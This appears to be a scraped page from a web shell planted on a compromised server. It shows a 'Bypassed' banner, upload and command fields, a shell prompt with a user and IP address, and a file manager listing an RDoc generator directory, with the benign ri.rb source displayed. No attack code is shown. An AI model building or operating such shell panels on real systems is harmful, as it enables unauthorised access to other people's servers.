[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.216.140: ~ $
# frozen_string_literal: true
##
# Generates ri data files

class RDoc::Generator::RI

  RDoc::RDoc.add_generator self

  ##
  # Description of this generator

  DESCRIPTION = 'creates ri data files'

  ##
  # Set up a new ri generator

  def initialize store, options #:not-new:
    @options    = options
    @store      = store
    @store.path = '.'
  end

  ##
  # Writes the parsed data store to disk for use by ri.

  def generate
    @store.save
  end

end


Filemanager

Name Type Size Permission Actions
pot Folder 0755
template Folder 0755
darkfish.rb File 20.26 KB 0644
json_index.rb File 7.63 KB 0644
markup.rb File 3.26 KB 0644
pot.rb File 2.25 KB 0644
ri.rb File 464 B 0644